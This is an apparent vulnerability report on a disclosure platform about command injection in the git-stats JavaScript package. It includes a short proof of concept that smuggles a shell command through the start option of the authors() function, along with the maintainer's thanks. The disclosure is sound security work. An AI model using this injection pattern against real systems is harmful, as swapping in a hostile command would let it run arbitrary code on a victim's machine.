Code Injection in ionicabizau/git-stats

Valid

Reported on

Aug 23rd 2020

Overview

git-stats is a js package for local git statistics including GitHub-like contributions calendars.

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands by using a semicolon char in any of the options.start or options.end values, using the authors() function.

Proof of Concept

var GitStats = require("git-stats");
var g1 = new GitStats();

g1.authors({
    start: ' " ;touch HACKED; #//',
    end: 'endstring'
}, (resp, pieData) => {
    console.log("Done!");
});

Occurrences

index.js L531

Ionică Bizău (Johnny B.) gave praise a year ago

Thank you for this and sorry for the late reply.

The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1

to join this conversation

Ionică Bizău (Johnny B.) gave praise a year ago

Thank you for this and sorry for the late reply.

The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1

to join this conversation